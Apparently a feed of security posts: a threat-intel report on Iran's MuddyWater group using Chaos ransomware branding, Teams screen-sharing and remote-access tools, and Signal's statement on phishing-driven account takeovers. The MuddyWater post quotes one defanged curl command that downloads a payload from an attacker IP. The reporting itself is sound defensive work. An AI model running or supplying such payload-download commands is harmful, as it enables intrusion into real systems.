ch0uch w.

Very interesting discovery & assessment: Iran’s MuddyWater APT observed using Chaos Ransomware. One key piece of context the R7 blog missed, however, is that MuddyWater has been around a long time and was found to use Thanos ransomware several years ago: https://t.co/TQ9RF8ql10

In early 2026, MuddyWater (Seedworm), a Iranian state backed threat group, operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, using it to obfuscate ransonware attacks. With Microsoft Teams being the main attack vector, where they used interactive screen-sharing to: • Harvest credentials • Manipulate Multi-Factor Authentication (MFA) Initial attribution comes from MuddyWater adopting alternative ransomware branding, in an effort to reduce attribution and maintain plausible deniability. With the apparent absence of file encryption, representing a deviation from typical ransomware behavior, the inconsistency indicates that the ransomware component may have functioned primarily as a facilitating or obfuscation mechanism. Initial access came from leveraging Microsoft Teams, where the threat actor engaged employees through external chat requests. Using a interactive screen-sharing exploit to compromise users. The attacker then conducted initial discovery, harvested credentials, including MFA manipulation, and quickly transitioned to using legitimate accounts for internal access. They then established persistence using remote access tools such as `DWAgent` and `AnyDesk`, before deploying additional payloads and further control of the environment. The TA would later execute commands via `RDP` to download additional payloads using curl: • `curl hxxp[://]172.86.126[.]208:443/ms_upd[.]exe -o C:\ProgramData\ms_upd[.]exe` Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations. The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT #IranAPT #IranWar https://t.co/uljjmrRvPX

A response to recent reporting in Germany, in service of clarity and accountability: First, it’s important to be precise when it comes to critical infrastructure like Signal. Signal was not “hacked” — in that our encryption, infrastructure, and the integrity of the app’s code was not compromised. However, sophisticated attackers have engaged in a harmful phishing campaign, posing as “Signal Support” by changing their profile display name and using social engineering to trick people into handing over their credentials — information that allowed these attackers to take over some targeted Signal accounts. This is something that plagues any mainstream messaging app once it reaches the scale of Signal, but we know how high the stakes are given the trust people place in us. In the coming weeks, you’ll see us rolling out a number of changes to help hinder these kinds of attacks. Because we don’t collect user data, what we know about these attacks comes from the victims of phishing. And from what victims have told us, the attacks followed a broad pattern: after tricking people into revealing their Signal credentials, attackers then used those credentials to take over their account and also frequently changed the associated phone number. Because such a change results in de-registering your Signal accounts, attackers prepared people for this by telling them that being de-registered was intended behavior, and that all they would need to do is “re-register,” or, create a new account. When they moved to create a new Signal account — one that was now decoupled from their hijacked account — the victims thought they were logging back in to their primary account. As a result, many didn't notice the takeover. The compromised accounts were then weaponized to target the victims' contact lists by posing as the owners of the account. We understand the trust that people put in Signal, and how devastating this kind of social engineering can be. While it’s true that all messaging platforms are susceptible to scammers and phishing that betrays people’s trust and convinces them to “unlock the front door” where no backdoor exists, we are looking to do everything we can to help people avoid and detect such scams. For the time being, please stay vigilant against phishing and account takeover attempts. Remember that no one from Signal Support will ever send you a message request or ask for your registration verification code or Signal PIN. For an added layer of protection, you can enable Registration Lock in your Signal Settings (Account -> Registration Lock).